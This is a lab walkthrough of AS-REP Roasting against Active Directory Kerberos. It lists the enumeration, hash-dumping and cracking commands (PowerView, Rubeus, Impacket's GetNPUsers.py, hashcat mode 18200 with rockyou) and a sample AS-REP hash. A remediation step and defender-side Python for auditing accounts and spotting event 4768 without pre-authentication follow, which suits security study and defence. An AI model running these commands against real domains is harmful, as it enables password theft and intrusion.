AS-REP Roasting Attack
AS-REP Roasting is an attack against Kerberos that targets user accounts which do not require pre-authentication. Pre-authentication is the first step in Kerberos authentication and is designed to prevent brute-force password guessing attacks.
During pre-authentication, the user's password is used to encrypt a timestamp, which is sent to the domain controller; the domain controller then attempts to decrypt it and validate the request. If that succeeds, a TGT is issued for the user to use in subsequent authentication.
The AS-REP response has two parts: the TGT, which is encrypted using the KRBTGT account's NTLM hash, and the session key (the enc-part in image 2), which is encrypted using the user account's NTLM hash. If pre-authentication isn't required, an attacker can send an AS-REQ for any user that has pre-authentication disabled and receive encrypted material back that can be cracked offline to reveal that user's password. An authenticated (but otherwise unprivileged) user can easily enumerate which users in the domain have this setting with the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).
Luckily, pre-authentication is required by default in Active Directory. However, it can be disabled per account through a user account control setting.
Image 1: [email protected] configured with 'Do not require Kerberos preauthentication'
Image 2: Wireshark capture of the AS-REP
My lab environment for this demonstration:
- [email protected] - user with Kerberos pre-authentication disabled
- redwolf-dc - domain controller
There are many tools that can perform an AS-REP Roasting attack; I will demonstrate with Rubeus (for Windows) and GetNPUsers.py (for Linux) from the Impacket scripts.
List the users that have pre-authentication disabled (this command requires PowerView to be loaded in memory):
Get-DomainUser -PreauthNotRequired
Then Rubeus.exe can be used to dump the encrypted session key present in the AS-REP:
.\Rubeus.exe asreproast /nowrap
Install the Impacket scripts (the setup.py step must be run from the cloned directory):
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket && sudo python3 setup.py install
Enumerate the users present in the domain and pass them to GetNPUsers.py:
GetNPUsers.py REDWOLF.LOCAL/[email protected] -dc-ip 192.168.62.2
Say this is the hash we get for the potential victim:
[email protected]:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213
We need to insert 23 after $krb5asrep$, because hashcat mode 18200 expects the $krb5asrep$23$user@realm:... format (23 is the RC4-HMAC encryption type used for this ticket).
Then we can use john or hashcat to crack the hash:
hashcat -m 18200 '<AS-REP hash from the previous step, with 23 inserted>' ~/Wordlist/rockyou.txt
To remediate, uncheck 'Do not require Kerberos preauthentication' in the Account Options of the affected user account.
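As an added example (not code from the original post), two defender-side checks for the condition this page describes: an audit that applies the same bit test as the LDAP filter above to a list of accounts, and a detection pass over Windows Security event 4768 fields that flags TGT requests served without pre-authentication. All account names, userAccountControl values and event records are constructed sample data.

```python
# Added example, not code from the original post: defender-side checks for the
# AS-REP roasting precondition. All account and event data is constructed.

DONT_REQ_PREAUTH = 0x400000  # 4194304, the bit the LDAP filter above tests for
RC4_HMAC = 0x17              # etype 23, the "23" inserted into the hash above

# Constructed (sAMAccountName, userAccountControl) pairs, as an LDAP export gives them.
SAMPLE_ACCOUNTS = [
    ("alice", 0x200),                          # NORMAL_ACCOUNT
    ("svc-legacy", 0x200 | DONT_REQ_PREAUTH),
    ("bob", 0x200 | 0x10000),                  # DONT_EXPIRE_PASSWORD only
    ("svc-report", 0x200 | 0x10000 | DONT_REQ_PREAUTH),
]

def preauth_not_required(accounts):
    """Names whose userAccountControl has DONT_REQ_PREAUTH set.

    This is what (userAccountControl:1.2.840.113556.1.4.803:=4194304) does:
    OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so an
    entry matches when every bit of 4194304 is set in the attribute value.
    """
    return [name for name, uac in accounts if uac & DONT_REQ_PREAUTH]

# Constructed fields from Windows Security event 4768 (Kerberos TGT requested).
# Pre-Authentication Type 0 means the KDC issued the AS-REP without preauth;
# 2 is PA-ENC-TIMESTAMP, the normal case described at the top of the page.
SAMPLE_4768_EVENTS = [
    {"account": "alice", "preauth_type": 2, "etype": 0x12, "client": "10.0.0.5"},
    {"account": "svc-legacy", "preauth_type": 0, "etype": RC4_HMAC, "client": "10.0.0.99"},
    {"account": "bob", "preauth_type": 2, "etype": RC4_HMAC, "client": "10.0.0.6"},
    {"account": "svc-report", "preauth_type": 0, "etype": 0x12, "client": "10.0.0.99"},
]

def asrep_roast_candidates(events):
    """4768 events served without preauth, grouped by requesting client address.

    Returns {client: [(account, etype), ...]}. RC4 (0x17) without preauth is the
    classic roasting signature; an AES (0x12) AS-REP without preauth is reported
    too, since the account is exposed either way and only the cracking cost differs.
    """
    hits = {}
    for ev in events:
        if ev["preauth_type"] == 0:
            hits.setdefault(ev["client"], []).append((ev["account"], ev["etype"]))
    return hits
```

One client requesting AS-REPs for several preauth-disabled accounts in a short window, as 10.0.0.99 does in the sample, is the pattern worth alerting on.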